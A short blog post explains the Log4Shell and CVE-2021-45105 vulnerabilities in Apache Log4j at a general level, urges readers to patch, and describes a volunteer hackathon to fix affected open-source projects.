Log4Shell is much worse than what you think. If you haven’t been living under a rock for the past month you would have probably heard of Log4J and the new vulnerabilities that have surfaced.
What is Log4j ?
Apache Log4j 2 is a free and open-source logging tool. It’s used by developers to return log messages related to the code they’ve written. It is one of the most widely used logging libraries in the Java environment. Using libraries like Log4j, programmers can reuse common components within their systems, saving them time from having to develop their own.
Isn’t that what open source software is all about? It allows you to modify it to match your specific needs! That is, until the recent discovery of “Log4Shell,” a zero-day vulnerability involving arbitrary code execution (CVE-2021-44228, rated ‘critical’).
Simply put, this flaw can allow an attacker to run any application remotely (over a network, like the Internet).
It’s bad
This vulnerability is extremely critical since it grants complete access to a machine running an unpatched version of Log4j. This would open the door to data theft, virus deployment, and other malicious activities.
It has been regarded as “the single biggest, most critical vulnerability of the last decade.” by the Apache Software Foundation, which has given it a score of ten out of ten for seriousness.
Another CVE appears
CVE-2021-44228 has been patched thankfully but then there is CVE-2021-45105 which recently appeared. Basically, this allows someone to execute DOS attacks on applications that use Log4j. Not as bad as a remote shell but it can badly cripple an organization’s system. However, upgrading to Log4j 2.17.0 fixes CVE-2021-45105.
What can we do now?
Start searching for applications that use Log4j and immediately patch them!
Keep everything up to date. Having a slightly outdated version of Log4j can be serious.
A hackathon is born
Me and some awesome members of the cyberstorm.mu team decided to organize a hackathon to help fix the Log4j vulnerabilities that reside in some open source projects over the weekend.
While I have seen some maintainers put in the effort to fix the issues, some don’t realize that their project is vulnerable. Even some companies aren’t aware of this even though they’ve been tons of articles online :/
We’re still hunting for open-source projects that need Log4j patches 🙂
Some interesting links:
- Log4j – Apache Log4j Security Vulnerabilities | Apache
- Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec
- NCSC-NL/log4shell
Credits to LunaSec for featured image.
